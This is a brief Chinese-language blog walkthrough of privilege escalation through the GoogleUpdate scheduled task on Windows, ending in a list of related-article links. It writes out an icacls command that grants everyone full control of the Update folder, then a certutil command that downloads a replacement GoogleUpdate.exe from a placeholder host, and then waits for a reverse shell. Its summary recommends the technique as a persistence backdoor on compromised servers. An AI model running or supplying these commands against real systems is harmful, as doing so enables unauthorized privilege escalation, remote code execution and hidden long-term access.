1、默认低权限无法写入:
GoogleUpdate计划任务提权

2、配置低权限可操控:icacls Update /grant everyone:f
GoogleUpdate计划任务提权

3、下载可执行程序:certutil -urlcache -split -f http://ip/GoogleUpdate.exe GoogleUpdate.exe

4、等待反弹shell:
GoogleUpdate计划任务提权

总结:
1、利用难度:挺难的吧,看管理员如何配置了,默认情况下无法进行利用,但是拿下服务器权限后可以作为一种权限维持的后门来进行使用

相关文章:

  • 2021-06-17
  • 2022-01-13
  • 2021-06-01
  • 2022-03-07
猜你喜欢
  • 2022-12-23
  • 2021-07-31
  • 2022-12-23
  • 2021-11-18
  • 2021-05-24
相关资源
相似解决方案